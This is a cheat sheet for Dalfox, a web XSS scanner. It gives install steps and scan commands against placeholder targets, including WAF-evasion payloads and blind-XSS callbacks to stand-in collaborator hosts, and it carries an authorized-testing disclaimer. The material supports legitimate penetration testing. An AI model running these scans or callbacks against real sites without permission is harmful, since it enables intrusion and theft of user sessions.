CyberCheatsheets

Dalfox Cheat Sheet

Fast parameter-based XSS scanner and proof-of-concept generator for web apps.

Web Application SecuritydomreflectedxssUpdated 2026-06-02

Overview

Dalfox scans URLs and parameters for reflected, stored, and DOM XSS with built-in payload generation and verification. Use after crawling or parameter lists from Arjun/ParamSpider on in-scope targets.

Authorized testing only. Use only on systems, networks, and accounts you own or have explicit written permission to test. Unauthorized access is illegal.

Install

go install github.com/hahwul/dalfox/v2@latest

or

sudo snap install dalfox

Essential commands

Single URL

dalfox url "https://target.example/search?q=test"

Pipe URLs from file

cat urls.txt | dalfox pipe

Parameter-focused scan

dalfox url "https://target.example/page?ref=home" --param ref

Common workflows

Reflected XSS on discovered parameters —

dalfox url "https://target.example/search?q=1" --mining-dict --waf-evasion
dalfox url "https://target.example/search?q=1" -b "https://your-collaborator.oastify.com"

Bulk from Katana/wayback list —

cat alive_urls.txt | dalfox pipe --silence --output dalfox_results.txt
dalfox file urls.txt -o results.json --format json

POST body and custom headers —

dalfox url "https://target.example/api" --data "name=test&email=a@b.c" --method POST
dalfox url "https://target.example/" -H "X-Forwarded-For: 127.0.0.1" --param X-Forwarded-For

Blind XSS with callback —

dalfox url "https://target.example/feedback" --blind "https://xss.your-callback.example/xss" --deep-domxss

Flags reference

url

Scan single URL

file

Scan URLs from file

pipe

Read URLs from stdin

--param

Target parameter name

--data

POST body

--method

HTTP method

-H

Custom header

-b

Blind XSS callback URL

--mining-dict

Parameter mining wordlist

--waf-evasion

WAF bypass payloads

--deep-domxss

Deeper DOM XSS checks

-o

Output file

--format

Output format (json, etc.)

--silence

Minimal console output

--proxy

HTTP proxy URL

Tips

  • Combine with paramspider or arjun output: scan only parameters that exist to reduce noise.
  • Use -b or --blind only with infrastructure you control (Burp Collaborator, your server).
  • --waf-evasion increases request volume; throttle on production or use off-hours windows in scope.
  • Verify findings manually in browser; Dalfox PoCs may need CSP/context adjustments.

References

Related cheat sheets